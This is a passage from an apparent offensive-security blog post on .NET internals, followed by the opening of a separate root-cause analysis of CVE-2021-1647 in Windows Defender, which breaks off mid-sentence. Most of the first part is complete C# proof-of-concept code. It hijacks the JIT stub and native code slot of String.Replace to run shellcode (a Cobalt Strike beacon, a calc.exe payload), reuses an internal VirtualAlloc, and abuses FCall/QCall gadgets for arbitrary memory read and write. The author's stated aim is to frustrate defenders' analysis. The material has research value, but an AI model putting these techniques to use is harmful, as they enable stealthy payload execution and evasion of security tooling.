    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ee.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + offsetof(MethodDesc, TempEntry)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX-protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which is when JIT compilation kicks in. Let’s see this in action by jmp‘ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
IntPtr mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, mem, shellcode.Length);

// Now we invoke our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);

Put together we get code like this:

using System;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecStubOverwrite
{
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine("[x] Error: mdcHasNonVtableSlot not set for this MethodDesc");
return;
}
// Get the String.Replace method stub
IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
// Alloc mem with p/invoke for now…
var mem = Internals.VirtualAlloc(IntPtr.Zero, shellcode.Length, Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite);
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Point the stub to our shellcode
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);
// FIRE!!
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
}
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
}
}


Once executed, if everything goes well, we end up with our beacon spawning from within .NET:

Now I know what you’re thinking… what about that VirtualAlloc call we made there… wasn’t that a P/Invoke that we were trying to avoid? Well, yes, smarty pants! This was a P/Invoke. However, in keeping with our exploration of weird ways to invoke .NET, there is nothing stopping us from stealing an existing P/Invoke from the .NET framework. For example, if we look within the Interop.Kernel32 class, we’ll see a list of P/Invoke methods, including… VirtualAlloc:

So, what about if we just borrow that VirtualAlloc method for our evil bidding? Then we don’t have to P/Invoke directly from our code:

var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), 0x3000, 0x40 });

Now, unfortunately, the Interop.Kernel32.VirtualAlloc P/Invoke method returns a void*, which means that we receive a System.Reflection.Pointer type. Playing around with this normally requires unsafe code, which for the purposes of this post I’m trying to avoid. So let’s try to convert that into an IntPtr using the internal GetPointerValue method:

IntPtr alloc = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });

And there we have allocated RWX memory without having to directly reference any P/Invoke methods. Combined with our execution example, we end up with a POC like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecStubOverwriteWithoutPInvoke
{
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine("[x] Error: mdcHasNonVtableSlot not set for this MethodDesc");
return;
}
// Get the String.Replace method stub
IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
// Nick p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Allocate memory
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
// Convert void* to IntPtr
IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Point the stub to our shellcode
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);
// FIRE!!
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}


And when executed, we get a nice beacon:

Now this is nice, but what if we want to run unmanaged code and then resume executing further .NET code afterwards? Well, we can do this in a few ways, but let’s have a look at what happens to our MethodDesc after the JIT process has completed. First, we take a memory dump of the String.Replace MethodDesc before it has been JIT’d:

If we then look again afterwards, we will see an address has been populated:

And if we dump the memory from this address:

What you are seeing here is called a “Native Code Slot”, which is a pointer to the compiled method’s native code once the JIT process has completed. Now, this field is not guaranteed to be present; we can tell if the MethodDesc provides a location for a Native Code Slot by again looking at the m_wFlags property:

The flag that we are looking to be set is mdcHasNativeCodeSlot:

If this flag is present, we can simply force JIT compilation and update the Native Code Slot, pointing it to our desired unmanaged code, meaning further execution of the .NET method will trigger our payload. Once executed, we can then jump back to the actual JIT’d native code to ensure that the original .NET code is executed. The code to do this looks like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecNativeSlot
{
public static void Execute()
{
// WinExec of calc.exe, jmps to address set in last 8 bytes
var shellcode = new byte[]
{
0x55, 0x48, 0x89, 0xe5, 0x9c, 0x53, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
0x56, 0x57, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48,
0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30,
0x48, 0x8b, 0x7e, 0x30, 0x8b, 0x5f, 0x3c, 0x48, 0x01, 0xfb, 0xba, 0x88,
0x00, 0x00, 0x00, 0x8b, 0x1c, 0x13, 0x48, 0x01, 0xfb, 0x8b, 0x43, 0x20,
0x48, 0x01, 0xf8, 0x48, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0xad, 0x48, 0x01,
0xf8, 0x81, 0x38, 0x57, 0x69, 0x6e, 0x45, 0x74, 0x05, 0x48, 0xff, 0xc1,
0xeb, 0xef, 0x8b, 0x43, 0x1c, 0x48, 0x01, 0xf8, 0x8b, 0x04, 0x88, 0x48,
0x01, 0xf8, 0xba, 0x05, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x25, 0x00,
0x00, 0x00, 0xff, 0xd0, 0x5f, 0x5e, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d,
0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
0x5b, 0x9d, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x8b, 0x05, 0x0b, 0x00, 0x00,
0x00, 0xff, 0xe0, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine("[x] Error: mdcHasNonVtableSlot not set for this MethodDesc");
return;
}
if ((md.m_wFlags & Internals.mdcHasNativeCodeSlot) != Internals.mdcHasNativeCodeSlot)
{
Console.WriteLine("[x] Error: mdcHasNativeCodeSlot not set for this MethodDesc");
return;
}
// Trigger Jit of String.Replace method
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
// Get the String.Replace method native code pointer
IntPtr nativeCodePointer = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
// Steal p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Allocate memory
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
// Convert void* to IntPtr
IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Take the original address
var orig = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
// Point the native code pointer to our shellcode directly
Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, mem);
// Set original address
Marshal.WriteIntPtr(mem + shellcode.Length - 8, orig);
// Charging Ma Laz0r…
System.Threading.Thread.Sleep(1000);
// FIRE!!
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
// Restore previous native address now that we’re done
Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, orig);
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
public const int mdcHasNativeCodeSlot = 0x0020;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}


And when run, we see that we can resume .NET execution after our unmanaged code has finished executing:

So what else can we find in the .NET runtime? Are there any other quirks we can use to transition between managed and unmanaged code?

InternalCall and QCall

If you’ve spent much time disassembling the .NET runtime, you will have come across methods annotated with attributes such as [MethodImpl(MethodImplOptions.InternalCall)]:

In other areas, you will see references to a DllImport to a strangely named QCall DLL:

Both are examples of code which transfers execution into the CLR. Inside the CLR they are referred to as an “FCall” and a “QCall” respectively. The reasons that these calls exist are varied, but essentially, when the .NET framework can’t do something from within managed code, an FCall or QCall is used to request that native code perform the function before returning to .NET.

One good example of this in action is something that we’ve already encountered, Marshal.GetDelegateForFunctionPointer. If we disassemble the System.Private.CoreLib DLL we see that this is ultimately marked as an FCall:

Let’s follow this path further into the CLR source code and see where the call ends up. The file that we need to look at is ecalllist.h, which describes the FCall and QCall methods implemented within the CLR, including our GetDelegateForFunctionPointerInternal call:

If we jump over to the native method MarshalNative::GetFunctionPointerForDelegateInternal, we can actually see the native code used when this method is called:

Now… wouldn’t it be cool if we could find some of these FCall and QCall gadgets which would allow us to play around with unmanaged memory? After all, forcing defenders to transition from .NET disassembly into reviewing the CLR source would certainly slow down static analysis… hopefully increasing that WTF!! factor during analysis. Let’s start by hunting for a set of memory read and write gadgets which, as we now know from above, will lead to code execution.

The first .NET method we will look at is System.StubHelpers.StubHelpers.GetNDirectTarget, which is an internal static method:

Again we can trace this code into the CLR and see what is happening:

OK, so this looks good: here we have an IntPtr being passed from managed to unmanaged code without any kind of validation that the pointer we are passing is in fact an NDirectMethodDesc object pointer. So what does that pNMD->GetNDirectTarget() call do?

So here we have a method returning a member variable from an object we control. A quick review shows that we can use this to read arbitrary memory, IntPtr.Size bytes at a time. How can we do this? Well, let’s return to .NET and try the following code:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ReadGadget
{
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType("System.StubHelpers.StubHelpers");
var GetNDirectTarget = stubHelper.GetMethod("GetNDirectTarget", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Spray away
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
}
}


And if we run this:

Awesome, so we have our first example of a gadget we can use to interact with unmanaged memory. Next, we should think about how to write memory. Again, if we review potential FCalls and QCalls, it doesn’t take long to stumble over several candidates, including System.StubHelpers.MngdRefCustomMarshaler.CreateMarshaler:

Following the execution path we find that this results in the execution of the method MngdRefCustomMarshaler::CreateMarshaler:

And again, if we look at what this method does within native code:

Checking on MngdRefCustomMarshaler, we find that m_pCMHelper is the only member variable present in the class:

So this one is easy: we can write 8 bytes to any memory location, as we control both pThis and pCMHelper. The code to do this looks something like this:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace NautilusProject
{
public class WriteGadget
{
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType("System.StubHelpers.MngdRefCustomMarshaler");
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod("CreateMarshaler", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
}
}


Let’s have some fun and use this gadget to modify the length field of a System.String object, showing the control we now have to modify arbitrary memory:

OK, so now we have our 2 (of MANY possible) gadgets, what would it look like if we transplanted them into our code execution example? Well, we end up with something pretty weird:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Linq;
namespace NautilusProject
{
internal class CombinedExec
{
public static IntPtr AllocMemory(int length)
{
var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
return mem;
}
public static void WriteMemory(IntPtr addr, IntPtr value)
{
var mngdRefCustomeMarshaller = typeof(System.String).Assembly.GetType("System.StubHelpers.MngdRefCustomMarshaler");
var CreateMarshaler = mngdRefCustomeMarshaller.GetMethod("CreateMarshaler", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
CreateMarshaler.Invoke(null, new object[] { addr, value });
}
public static IntPtr ReadMemory(IntPtr addr)
{
var stubHelper = typeof(System.String).Assembly.GetType("System.StubHelpers.StubHelpers");
var GetNDirectTarget = stubHelper.GetMethod("GetNDirectTarget", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
IntPtr unmanagedPtr = Marshal.AllocHGlobal(200);
for (int i = 0; i < 200; i += IntPtr.Size)
{
Marshal.Copy(new[] { addr }, 0, unmanagedPtr + i, 1);
}
return (IntPtr)GetNDirectTarget.Invoke(null, new object[] { unmanagedPtr });
}
public static void CopyMemory(byte[] source, IntPtr dest)
{
// Pad to IntPtr length
if ((source.Length % IntPtr.Size) != 0)
{
source = source.Concat<byte>(new byte[IntPtr.Size - (source.Length % IntPtr.Size)]).ToArray();
}
GCHandle pinnedArray = GCHandle.Alloc(source, GCHandleType.Pinned);
IntPtr sourcePtr = pinnedArray.AddrOfPinnedObject();
for (int i = 0; i < source.Length; i += IntPtr.Size)
{
WriteMemory(dest + i, ReadMemory(sourcePtr + i));
}
}
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var ecBase = ReadMemory(t.TypeHandle.Value + 0x28);
var mdcBase = ReadMemory(ecBase + 0x20);
IntPtr stub = ReadMemory(mdcBase + 0x18 + 8);
var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
IntPtr mem = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
CopyMemory(shellcode, mem);
CopyMemory(jmpCode, stub);
WriteMemory(stub + 2, mem);
"ANYSTRING".Replace("XPN", "WAZ'ERE", true, null);
}
public static class Internals
{
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}


And of course, if we execute this, we end up with our desired result of unmanaged code execution:

A project providing all examples in this post can be found here.

With the size of the .NET framework, this of course only scratches the surface, but hopefully has given you a few ideas about how we can abuse some pretty benign looking functions to achieve unmanaged code execution in weird ways. Have fun!

CVE-2021-1647: Windows Defender mpengine remote code execution

Microsoft Defender Remote Code Execution Vulnerability

Original text by Maddie Stone

The Basics

Disclosure or Patch Date: 12 January 2021

Product: Microsoft Windows Defender

Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647

Affected Versions: Version 1.1.17600.5 and previous

First Patched Version: Version 1.1.17700.4

Issue/Bug Report: N/A

Patch CL: N/A

Bug-Introducing CL: N/A

Reporter(s): Anonymous

The Code

Proof-of-concept:

Exploit sample: 6e1e9fa0334d8f1f5d0e3a160ba65441f0656d1f1c99f8a9f1ae4b1b1bf7d788

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Heap buffer overflow

Vulnerability details:

There is a heap buffer overflow when Windows Defender (mpengine.dll) processes the section table while unpacking an ASProtect-packed executable. Each section entry has two values: the virtual address and the size of the section. The code in CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects only checks if the next section entry’s address is lower than the previous one, not if they are equal. This means that with a section table such as the one used in this exploit sample, [ (0,0), (0,0), (0x2000,0), (0x2000,0x3000) ], 0 bytes are allocated for the section at address 0x2000, but when the code sees the next entry at 0x2000, it simply skips over it without exiting or updating the size of the section. 0x3000 bytes will then be copied to that section during decompression, leading to the heap buffer overflow.

if ( next_sect_addr > sect_addr )// current va is greater than prev (not also eq)
{
    sect_addr = next_sect_addr;
    sect_sz = (next_sect_sz + 0xFFF) & 0xFFFFF000;
} 
// if next_sect_addr <= sect_addr we continue on to next entry in the table 

[...]
			new_sect_alloc = operator new[](sect_sz + sect_addr);// allocate new section
[...]
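To make the flaw concrete, the loop above can be modelled in a few lines of Python (an illustrative sketch with an assumed initial state, not Defender’s actual code), using the section table from the exploit sample:

```python
# Illustrative model of the vulnerable section walk in
# CAsprotectDLLAndVersion::RetrieveVersionInfoAndCreateObjects.

def allocation_size(sections):
    """Mimics the flawed loop: the strict '>' means a duplicate
    virtual address is skipped without updating the section size."""
    sect_addr = 0
    sect_sz = 0
    for next_addr, next_sz in sections:
        if next_addr > sect_addr:
            sect_addr = next_addr
            sect_sz = (next_sz + 0xFFF) & 0xFFFFF000   # round up to a page
    return sect_addr + sect_sz                         # passed to operator new[]

# (virtual address, size) table from the exploit sample
sections = [(0x0, 0x0), (0x0, 0x0), (0x2000, 0x0), (0x2000, 0x3000)]
alloc = allocation_size(sections)
print(hex(alloc))        # 0x2000 -- the 0x3000-byte entry was never counted

# Decompression still writes the last section in full at offset 0x2000:
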